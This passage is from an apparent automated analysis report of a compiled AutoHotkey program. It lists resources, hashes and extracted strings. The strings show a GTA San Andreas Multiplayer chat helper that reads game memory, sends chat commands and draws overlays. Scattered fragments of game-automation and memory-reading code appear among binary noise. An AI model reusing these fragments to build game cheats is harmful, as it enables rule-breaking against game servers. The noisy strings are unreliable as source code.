            "language": "LANG_ENGLISH",
            "sublanguage": "SUBLANG_ENGLISH_US",
            "entropy": "2.96"
          },
          {
            "name": "RT_RCDATA",
            "offset": "0x00136168",
            "size": "0x0000301f",
            "filetype": null,
            "language": "LANG_ENGLISH",
            "sublanguage": "SUBLANG_ENGLISH_US",
            "entropy": "5.76"
          },
          {
            "name": "RT_GROUP_ICON",
            "offset": "0x00139188",
            "size": "0x00000030",
            "filetype": null,
            "language": "LANG_ENGLISH",
            "sublanguage": "SUBLANG_ENGLISH_US",
            "entropy": "2.46"
          },
          {
            "name": "RT_GROUP_ICON",
            "offset": "0x001391b8",
            "size": "0x00000014",
            "filetype": null,
            "language": "LANG_ENGLISH",
            "sublanguage": "SUBLANG_ENGLISH_US",
            "entropy": "2.02"
          },
          {
            "name": "RT_GROUP_ICON",
            "offset": "0x001391cc",
            "size": "0x00000014",
            "filetype": null,
            "language": "LANG_ENGLISH",
            "sublanguage": "SUBLANG_ENGLISH_US",
            "entropy": "1.98"
          },
          {
            "name": "RT_GROUP_ICON",
            "offset": "0x001391e0",
            "size": "0x00000014",
            "filetype": null,
            "language": "LANG_ENGLISH",
            "sublanguage": "SUBLANG_ENGLISH_US",
            "entropy": "2.08"
          },
          {
            "name": "RT_GROUP_ICON",
            "offset": "0x001391f4",
            "size": "0x00000014",
            "filetype": null,
            "language": "LANG_ENGLISH",
            "sublanguage": "SUBLANG_ENGLISH_US",
            "entropy": "2.08"
          },
          {
            "name": "RT_VERSION",
            "offset": "0x00139208",
            "size": "0x0000021c",
            "filetype": null,
            "language": "LANG_ENGLISH",
            "sublanguage": "SUBLANG_ENGLISH_US",
            "entropy": "3.25"
          },
          {
            "name": "RT_MANIFEST",
            "offset": "0x00139424",
            "size": "0x000004f4",
            "filetype": null,
            "language": "LANG_ENGLISH",
            "sublanguage": "SUBLANG_ENGLISH_US",
            "entropy": "5.35"
          }
        ],
        "versioninfo": [
          {
            "name": "FileDescription",
            "value": ""
          },
          {
            "name": "FileVersion",
            "value": "1.1.37.01"
          },
          {
            "name": "InternalName",
            "value": ""
          },
          {
            "name": "LegalCopyright",
            "value": ""
          },
          {
            "name": "CompanyName",
            "value": ""
          },
          {
            "name": "OriginalFilename",
            "value": ""
          },
          {
            "name": "ProductName",
            "value": ""
          },
          {
            "name": "ProductVersion",
            "value": "1.1.37.01"
          },
          {
            "name": "Translation",
            "value": "0x0409 0x04b0"
          }
        ],
        "imphash": "8ebf8cdff0edfb71b612fb21cbde3410",
        "timestamp": "2023-07-08 05:26:14",
        "icon": "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",
        "icon_hash": "26a5a9172b6cdded5702af7b3962ed10",
        "icon_fuzzy": "1a6ae092b733c43153c15fa33ea788be",
        "icon_dhash": "fcccc4e4cccc4cbe",
        "imported_dll_count": 14
      },
      "data": null,
      "strings": [
        "GetDC",
        "Class",
        "H!D$ D",
        "#IfTimeout",
        "OF>;^",
        "t$@H3",
        "Clipboard:=Key",
        "user32",
        "H9U8u",
        "#InputLevel",
        "PriorKey",
        "CfD9#u",
        "H9l$@u",
        "Hc|$X",
        "IsValidCodePage",
        "AtlAxGetControl",
        "OLEAUT32.dll",
        "player := prread(getprocessid(), 0xB6F5F0)",
        "D9D$`",
        "*uzfE9e",
        "CRLF)",
        ")t$ A",
        "t$(93",
        "D$$A;",
        "         h((((                  H",
        "WinSet",
        "StatusBar",
        ";L$Pu7A",
        "K0LcY",
        "hud:=!hud",
        "|$ L+",
        "variable",
        "VVVVVVVVVVVVV",
        "RWin ",
        "<>=/|^,:*&~!()[]{}+-?",
        "|$ Ic",
        "%sTop",
        "L9h8u",
        "rp := RegExReplace(rp, \"\\Q$\\Eday\", time.d)",
        "d$0H9K",
        "D8L$qt",
        "!\\$0!\\$(!\\$ L",
        "RtlGetVersion",
        "\\C not allowed in lookbehind assertion",
        "H;_8s'H",
        "settimer, arem, 1",
        "[[[[[[[[[",
        "RawRead",
        "A;D$ ",
        "\\: (.*)_(.*)\", nick)",
        "t$LD+l$@D+t$DD",
        "DrawTextW",
        "gui, 5:color, black",
        "D$pfA",
        "SoundGetWaveVolume",
        "Mouse",
        "[[[[[[[[[[[[[[[[[[[[[[[[",
        "Uppercase",
        "9qT~EH",
        "Process",
        "ERROR",
        "Invalid usage.",
        "MapVirtualKeyW",
        "WinHide",
        "H;n8|",
        "Too few parameters passed to function.",
        "Lowercase",
        "UVWATAUAVAWH",
        "@UWAUH",
        "T$XD;T$\\",
        " A\\_^",
        "?@En[vP",
        "f9-#@",
        "T$XLcL$HL",
        "Hct$PH",
        "-64OS",
        "GuiControl, 1:, M4, % ahk[i+1]",
        "Out of memory.  The current thread will exit.",
        "LineCount",
        "(;k r",
        "IfGreaterOrEqual",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "GetText",
        " (%0.2f)",
        "GetFileVersionInfoW",
        "@UAVH",
        "A_A^A]A\\_",
        "sleep 1100",
        "Mouse hook: %s",
        "Could not open URL https://autohotkey.com in default browser.",
        "FormatInteger",
        "global agun, id1, id2, remed, nick1, nick2, id2, pass, i, li, apt, arbar, hpbar, hud:=1, hp, ar",
        "FileGetVersion",
        "KeyDelayPlay",
        "SetMenu",
        ".?AVObject@@",
        "frexp",
        "D9P(t",
        "d$ UH",
        "@8|$8t",
        "PCRE does not support \\L, \\l, \\N{name}, \\U, or \\u",
        "|$8E2",
        "SystemTimeToFileTime",
        "Unexpected \")\"",
        "Tt@E3",
        "Olive",
        "@sqrt",
        "ComboBox",
        "NH+D$TD",
        "ascii",
        "Restore",
        "v#H;k",
        "Myanmar",
        "(?R or (?[+-]digits must be followed by )",
        "IsDialogMessageW",
        "L$`uT",
        "[ UVWH",
        "EndMods",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "Parent",
        "Cursor",
        "A_A^A]A\\^][",
        "|$ fE",
        "Program: ",
        "fD9#t",
        "M09u(u}H",
        "]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]",
        "GetProcAddress",
        "OSVersion",
        "\\$ UVWAUAWH",
        "QueryPerformanceCounter",
        "Unhandled exception.",
        "@8=aw",
        "GuiControlEvent",
        "t$ UATAUAVAWH",
        "?JV8f",
        "IsWindowVisible",
        "DEFINE group contains more than one branch",
        "StdOut",
        "Catch",
        "Numpad2",
        "Yacute",
        "A9q$~",
        "v%H;w",
        "WINMM.dll",
        "KbdLayerDescriptor",
        "KeyHistory",
        "VerCompare",
        "H9JHw",
        "|$(E3",
        "SUVWATAUH",
        "gdi32",
        "graph",
        "{Blind}{%s Up}",
        "D%0fA",
        "oacute",
        "L$8H3",
        "t'H+D$`L",
        "T$8;A ",
        ";_ r\"H",
        "9\\$8t",
        "\\$ WAUAVH",
        "SplitPath",
        "RegRead, nick, HKEY_CURRENT_USER, Software\\SAMP, PlayerName",
        "__fastcall",
        "#IncludeAgain",
        "local",
        "ntilde",
        "D8\"u%H",
        "8\\$sH",
        "gui, 5:show, x%xap% y%yap% w250 h130 NoActivate, ",
        "Linear_B",
        "Double",
        "if(i==li)",
        "AtEOF",
        "A+C0L",
        "uvfD9%H",
        "t$ ATAUAV",
        "L$hE3",
        "T$`+T$X",
        "#SingleInstance",
        "Uacute",
        "D$\\A;",
        "Gui, 3:+ToolWindow -Caption +Owner +AlwaysOnTop +E0x20",
        "eacute",
        "@A_A^A\\_^][",
        "CTRLDOWN",
        "UpArrow",
        "BackspaceIsUndo",
        "GetBase",
        "\\$0t=H",
        "fD9 u",
        "if GetKeyState(\"ESC\", \"P\") or GetKeyState(\"F6\", \"P\") {",
        "DeleteCol",
        "fA9<$t",
        "L$ UVWATAUAV",
        ":u#fD9i",
        "L$(I#",
        "L$8M#",
        "D$&8\\$&t-8X",
        "1#QNAN",
        "mouse_event",
        "ClientToScreen",
        "IfWinNotExist GTA:SA:MP",
        "RegExmatch(ar, \"(.*)\\.\", sar)",
        "EnableThemeDialogTexture",
        "GetStdHandle",
        "Bottom",
        "SetKeyboardState",
        "AltTabAndMenu",
        "unmatched parentheses",
        "Built-in variables must not be declared.",
        "(;Y r",
        ")t$Pf",
        "umH9|$8t",
        "(;~ r",
        "t[9-h",
        "VWATH",
        "\\$ UH",
        "C0;C sAH",
        "l$@fffff",
        "L$hffff",
        "__thiscall",
        "getid() {",
        "close AHK_PlayMe",
        "Armenian",
        "__Call",
        "d$LIcETD",
        "IGNORE",
        "GetTickCount",
        "A label must not point to an ELSE or UNTIL or CATCH.",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "uLffff",
        "class",
        "IsObject",
        "punct",
        "SetTimer, acuff, 1",
        "yag:=A_ScreenHeight - 40",
        "{LCtrl up}",
        "] is an invalid data character in JavaScript compatibility mode",
        "WinKill",
        "v\"H;w",
        "cedil",
        "?}u&A",
        "\\$HE3",
        "D;D$T",
        "u?9G,t!3",
        "internal error: previously-checked referenced subpattern not found",
        "Gui, launcher:Add, Text, x18 y19 w270 h30 +Center, ",
        "AElig",
        "`vftable'",
        "f;D$@uD",
        "Old_Italic",
        "Client",
        "For %s,%s in %s",
        "ULlTt",
        "Compile error %d at offset %d: %hs",
        "return object(\"d\", A_DD, \"m\", A_MM, \"y\", A_Year, \"h\", A_Hour, \"m\", A_Min, \"s\", A_Sec)",
        "EventInfo",
        "GetWindow",
        "SendAndMouse",
        "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS\\VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV[[[[[[[[[[[[[[[[[[[[[VVVV",
        "SetHandleCount",
        "sleep 1",
        "SetBkColor",
        "RShift",
        "ListBox",
        "raquo",
        "y,.u+",
        "Tagbanwa",
        "_hypot",
        "L$ffD",
        "v%H;{",
        "A^A]A\\_^]",
        "FocusV",
        "WinGetClass",
        "|$@tE",
        "FileInstall",
        "Listbox",
        "No tray mem",
        "ATAUAVH",
        "u+H9s",
        "[\\]^_`",
        "(A_A]A\\]",
        "USVWAWH",
        "ub8\\$Du\\",
        "WinMinimizeAll",
        "Random",
        "StringSplit",
        "v(L;g",
        "RegDeleteKeyExW",
        "An older instance of this script is already running.  Replace it with this instance?",
        "v%I;^",
        "StrSplit",
        "$+L;d$Hr*K",
        "GetVersion",
        "WinGet",
        "l$ D!",
        "Gui, launcher:Add, Text, x22 y49 w260 h20 +Center, %nick%",
        "SUVWATAUAVAWH",
        "<>=/|^,:.+-*&!?~",
        "@8q#u",
        "]/D+]'A",
        "TimeSinceThisHotkey",
        "fA9<$",
        "fA9T$",
        "T$@A;",
        "static",
        "WantReturn",
        "this version of PCRE is not compiled with Unicode property support",
        "GetOEMCP",
        "9D$xuXH",
        "XA_A^A]A\\_^[]",
        "t$ H;",
        "Delete",
        "\\\\.\\%c:",
        "|$xH+",
        "SubStr",
        "&tilde;",
        "H9D$8ubI",
        "VERSION.dll",
        "StringLen",
        "v2L;c",
        "T$lf9",
        "0A]A\\_^]",
        "p WATAUAVAWH",
        "8A]A\\",
        "IfWinNotExist",
        "FileSetAttrib",
        "Input, input, V I M, {ENTER}{ESC}{F6}",
        "vk%02X",
        "u;D9%rH",
        "Thaana",
        "B0H9A0",
        "D8i#u",
        "A^A]A\\_^",
        "InsertCol",
        "Keybd hook: %s",
        "SetCapslockState",
        "Numpad3",
        "uBfA9E",
        "l$JfD",
        "fD91u:A",
        "( 8PX",
        "HICON:",
        "icirc",
        "Duplicate declaration.",
        "DragFinish",
        "QueryDosDeviceW",
        "Default:",
        "GuiControl, 5:+cGreen +Redraw, pstatus, ",
        "KeyUp",
        "0A\\^]",
        "`A_A^_][",
        "11GuiClose:",
        "CapsLock",
        ":?:/r::",
        "IniRead, slots, rp.ini, settings, slots",
        "Functions cannot contain functions.",
        "D$$E3",
        "Source:",
        "f9t$0tyH",
        "BF>^G",
        "L0:A:",
        "fD9+u",
        "Invalid or nonexistent owner or parent window.",
        "x0Du'",
        "|$@-D",
        "abcdefghijklmnopqrstuvwxyz",
        "gui, 1:add, text,  cGreen vM3 x0 w250 Center, % ahk[i]",
        "SUVWATAUAVH",
        "MenuGetHandle",
        "HcT$P",
        ")f9l$ ",
        "*D$0f",
        "H9|$8",
        "0A]_]",
        "A\" upHc",
        "L$dLc",
        " Type Descriptor'",
        "D8d$8t",
        "GetMessageW",
        "t\\fA9E",
        "GetSubMenu",
        "SHBrowseForFolderW",
        "SetWinDelay -1",
        "E9,$~T3",
        "if !RegExmatch(getchatline(findline(\"",
        "PostThreadMessageW",
        "V(N9\\",
        "|$(fD",
        "d$PfA#",
        "Error text not found (please report)",
        "floor",
        "2fD9!t",
        "@SUVWATH",
        "ExStyle",
        "fD; sSH",
        "SUVWATAUAWH",
        "L$xfD",
        "regular expression is too large",
        "Numpad9",
        "(A^A]",
        "CoordMode",
        "MouseDelayPlay",
        "FileDescription",
        "FileMoveDir",
        "Ntilde",
        " A]A\\_",
        "D$@?H",
        "@SUVWAUAVAWH",
        "Tagalog",
        "HeapFree",
        "C:f9C",
        "H9\\$p",
        "gui, 3:hide",
        "]HfA;",
        "Throw",
        "UWAUH",
        "Normal",
        "<rt4E3",
        "L$pE3",
        ";E s>H",
        "D8q#u",
        "SetTimer, patrol, 1",
        "|$hfA",
        "Gui, launcher:Destroy",
        "gui, 6:add, text, cBlue varbar, ",
        "Check",
        "I;t$0|",
        "EnumClipboardFormats",
        "<program name unknown>",
        "GdipCreateBitmapFromFile",
        "sendchat(\"/rem\")",
        "AutoHotkeyGUI",
        "KeyWait",
        "SetFileTime",
        "Value",
        "OpenSCManagerW",
        "Gui, 1:Show, y%y% x%x% w250 NoActivate, ",
        "t8ffffff",
        "@SWATAVAWH",
        "ExtractIconW",
        "GetModuleBaseNameW",
        "SVWATAUAVAWH",
        "DefDlgProcW",
        "u4fA9D$",
        ":;<=>?@",
        "WebRequest.Open(\"GET\", url, false)",
        "SUWAVAWH",
        "(t$`H",
        "Not a valid property getter/setter.",
        "GuiControl, 4:+cRed +Redraw, apt",
        "Alnum",
        "|$8fD",
        "|Ln\\u",
        "Flags",
        "agrave",
        "D$ H;",
        "RunWait",
        "t-fffff",
        "Error: ",
        "ClipWait",
        "9uu<ffff",
        "ControlMove",
        "hud() {",
        "DestroyMenu",
        "v#H;{",
        "VWATAUAVH",
        "Sunday",
        "VirtualAllocEx",
        "D$`I9F",
        "D$<+D$4",
        "u)H9}",
        "This indicates a bug in your application.",
        "Zod(^?",
        "DecodePointer",
        "SendMessage",
        "@SATAVH",
        "UWATH",
        "mixerGetControlDetailsW",
        "/force",
        "Running",
        "Window: %s",
        "GetDIBits",
        "T$0E+",
        "DetectHiddenText On",
        "d$LE3",
        "L$Pf91u",
        "700WP",
        "internal error: code overflow",
        "#EscapeChar",
        "NewInput",
        "hbitmap:",
        "Parameter #3 must not be blank in this case.",
        "WinMaximize",
        "@8y#u",
        ":\" nick2 \", ",
        "GetMenuItemCount",
        "DISPLAY",
        "ScreenDPI",
        "White",
        "u1D8d$xD",
        "u%L9o@t",
        "VirtualProtect",
        "u1fB9D{",
        "RegExMatch(GetChatLine(1), \"",
        "TickInterval",
        "u\"L9%Q!",
        "SetMouseDelay -1",
        "RawGet",
        "System exception 0x%X.",
        "Arrow",
        "__restrict",
        "CopyImage",
        "PA^A]A\\_^",
        "GetSaveFileNameW",
        "L$HfA9M",
        "MessageBoxW",
        "mscoree.dll",
        "`virtual displacement map'",
        "`vector destructor iterator'",
        "Reset",
        "LCMapStringW",
        "UseUnsetGlobal",
        "8D$CL",
        "D$xfE9}",
        "`vbtable'",
        "BlockInput, off",
        "SetCapacity",
        "D$PLc",
        "digit expected after (?+",
        "NumpadIns",
        "DefWindowProcW",
        "Global",
        "FileOpen",
        "H+\\$x",
        "FileRecycleEmpty",
        "_nextafter",
        "HcL$H",
        "kfD9~",
        "Do you want to continue?",
        "u9D8w#u",
        "v4I;w",
        "@SVWAUH",
        "RegDeleteKeyW",
        "FileSetTime",
        "IfWinExist",
        "CoordModePixel",
        "Duplicate class definition.",
        "Purple",
        "H;K(u",
        "Interrupted threads: %d%s",
        "Target label does not exist.",
        "GetSelection",
        "\"%s\" %s",
        "Params: <%-0.400s%s>",
        "L$ VWH",
        "ControlGetFocus",
        "$Ib?s",
        "ByRef",
        "Critical Error",
        "Close",
        "A_A^A]A\\_][",
        "|$@A_A^A]A\\",
        "Button%s",
        "\\P{Xps}",
        "msctls_trackbar32",
        "A(H9t8",
        "<>H;} rzH",
        "d?000000`?",
        "IcF I",
        "9uu8f",
        "@8h#u",
        "IsVariadic",
        "IsCharUpperW",
        "Buddy",
        ".?AVCStringCharFromWChar@@",
        "NoTimers",
        "Description:",
        ".?AVInputObject@@",
        "fE9l$",
        "T$pE3",
        "Declaration too long.",
        "guihide()",
        ".?AVEnumComCompat@@",
        "IniRead",
        "?:kP<",
        "?8bunz8",
        "SHGetFolderPathW",
        "/>58d%",
        "GroupActivate",
        "Parameter #2 invalid.",
        "[[[[[Z",
        "if allrp=ERROR",
        "l$xE+",
        "runtime error ",
        "Shift",
        "WinActive",
        "Ccedil",
        "Parameter #1 invalid.",
        "not found",
        "D8c>u",
        " Hct$pMc",
        "D8a t",
        "alnum",
        "StringRight",
        "sendchat(\"/id \" id1)",
        "@SVWAWH",
        "<$)ux3",
        "A_A^A\\_^[]",
        "d$ UAUAVH",
        "Checked",
        "H;l$p",
        "GetStockObject",
        "v$H;{",
        "FindNextFileW",
        "AppDataCommon",
        "z'u%3",
        "gfffffffH",
        " A_A]A\\_^",
        "{All}",
        "GetWindowLongPtrW",
        "t'D8c#u",
        "Uy]E3",
        "HcT$\\H",
        "GetProcessHeap",
        "u/@8t$2D",
        "l$ WATAUH",
        "return",
        "MinSize",
        "Cyrillic",
        "ScreenWidth",
        "0Lct$xL",
        "D$p H",
        "Gujarati",
        "GlobalUnlock",
        "RControl",
        "A__^[]",
        "HeapSetInformation",
        "GetLastActivePopup",
        "SetBatchLines",
        "9wBE3",
        "GroupDeactivate",
        "l$(Hci0H",
        "?R0I?",
        "UseUnsetLocal",
        "@.data",
        " wTtI",
        "Sleep",
        "E9<$u",
        "fD9\\$`tVH",
        "Startup",
        "l$Hu I",
        "@VWAUAVAWH",
        "L$xD+\\$tL",
        "u$fA9",
        "%02X  %03X",
        "r@8{^tB9{@vg",
        "L;|$xrKH",
        "PSAPI.DLL",
        "vAL;m",
        "x ATAUAWH",
        "AppendMenuW",
        ": NumGet(buf, type)",
        "ComObjCreate(\"SAPI.SpVoice\").Speak(text)",
        "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\" xmlns:v3=\"urn:schemas-microsoft-com:asm.v3\"><assemblyIdentity version=\"1.1.00.00\" name=\"AutoHotkey\" type=\"win32\" /><dependency><dependentAssembly><assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" /></dependentAssembly></dependency><compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\"><application><supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/><supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/><supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/><supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/><supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/></application></compatibility><v3:application><v3:windowsSettings xmlns=\"http://schemas.microsoft.com/SMI/2005/WindowsSettings\" xmlns:ws2=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\"><dpiAware>true</dpiAware><ws2:longPathAware>true</ws2:longPathAware></v3:windowsSettings></v3:application><v3:trustInfo><v3:security><v3:requestedPrivileges><v3:requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\" /></v3:requestedPrivileges></v3:security></v3:trustInfo></assembly> PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX",
        "BatchLines",
        "- unable to initialize heap",
        "QD8u>t",
        "Unknown class var.",
        "TTTTTTTTT",
        "v!I;z",
        "Hotstring max abbreviation length is 40.",
        "TimeSincePriorHotkey",
        "ScriptName",
        "Fuchsia",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "GetTextFaceW",
        "PCREA",
        "700PP",
        "Speakers",
        "EPH9C",
        "FindFirstFileW",
        "ComObj",
        "SplashTextOn",
        "\\g is not followed by a braced, angle-bracketed, or quoted name/number or by a plain number",
        "ComputerName",
        " delete",
        "Pos%d",
        ">H;l$xs#H",
        "PA_A]A\\_]",
        "@UATAUH",
        "@UVAUH",
        "IniRead, rps, rp.ini, % ahk[i]",
        "oslash",
        "t}@8p",
        "Flash",
        "SSSSS",
        "IPAddress3",
        "H9l$@t)f",
        "t,Hc]",
        "#Requires",
        "L09A:",
        "t1L95f",
        "D9M8vHI",
        "ThisFunc",
        "l$XE3",
        "Suspend",
        "NoMouse",
        "GetKeyboardState",
        "?t @7d",
        "t$Ptu",
        "EnvMult",
        "v%I;}",
        "Active",
        "@SVWAVAWH",
        "failed to get memory",
        "0D8s#u",
        "Press [F5] to refresh.",
        "&Key history and script info",
        "D$`H9C",
        "MapWindowPoints",
        "ABORT",
        "D$`HcK",
        "SetWindowPos",
        "GetDlgItem",
        "D$@I;",
        "StartupCommon",
        "HeapCreate",
        "f#C\"fA",
        "IBeam",
        "L$xH;",
        "invalid UTF-8 string",
        "SUVWAVH",
        "A^_^[]",
        "StringFromGUID2",
        "D$HH;",
        "ubf9E",
        "A;\\$ s",
        "SendInput {f6}{end}+{home}{del}{esc}",
        "Toggle",
        "fA9l$",
        "BitAnd",
        "LoopRegType",
        "9uu?H",
        "FileCreateDir",
        "Redraw",
        "GetCommandLineW",
        "B0I9B0",
        "v'H;~",
        "L!l$HL!l$@",
        "#Hotstring",
        "L9Y0u",
        "McH,H",
        "SetRect",
        ")t$pE",
        "if !remed {",
        ";H9>&X",
        "RemoveAt",
        "`eh vector destructor iterator'",
        "fD92t",
        "RegRead",
        "a numbered reference must not be zero",
        "UTF-16LE",
        "USVWAUAWH",
        "SetParent",
        "IfWin should be #IfWin.",
        "(T?j?Y",
        "A0H9C`u",
        " with same name as a global",
        "Osmanya",
        "THORN",
        "\\$(E3",
        "__Set",
        "BringWindowToTop",
        "SetKeyDelay",
        "Buginese",
        "DateTime",
        "EndChars",
        "Unsupported method call syntax.",
        "Parameter default required.",
        "H9Y u1H",
        "(t$ f",
        "sendchat(RP)",
        "H;5($",
        "Mandaic",
        "CreateEllipticRgn",
        "-BH>t",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "MaxIndex",
        "settimer, password, 1",
        "A^A\\_^]",
        "D$DIc",
        "I)l$0",
        "v&I;\\$",
        "@8t$`u",
        "syntax error in subpattern name (missing terminator)",
        "GetDateFormatW",
        "Too many var/func refs.",
        "Aring",
        "[[[[[[[[[[[[[[",
        "ffffff",
        "EnableWindow",
        " A^A\\_",
        "H9;u^D8c",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[VVV",
        "D$`I9G",
        "ot$@H",
        "sendinput {space down}",
        "\\p{Xsp}",
        "GetFileSizeEx",
        "A)ETE3",
        "D$hfA",
        "t$pE3",
        "\\$PtAH",
        "GetSystemTime",
        "sendchat(\"",
        "l$ WATAVH",
        "[8H9x",
        "FindWindowW",
        "SendMessage, 0x50,, 0x4190419,, A",
        "REG_MULTI_SZ",
        "sendinput {w down}",
        "CreateProcessWithLogonW",
        "u0fA9l$",
        "d$XfA",
        "t$(M;|$(t",
        "FileGetAttrib",
        "YD$`f",
        "GuiControl, 6:, arbar, ",
        "#32771",
        "SetTextColor",
        "%.*s.Get%s",
        "t?=\"!",
        "IniRead, allrp, rp.ini, w%id%",
        "\\$xA;",
        "A_A\\_^]",
        "~0Au;H",
        "FINALLY with no matching TRY or CATCH",
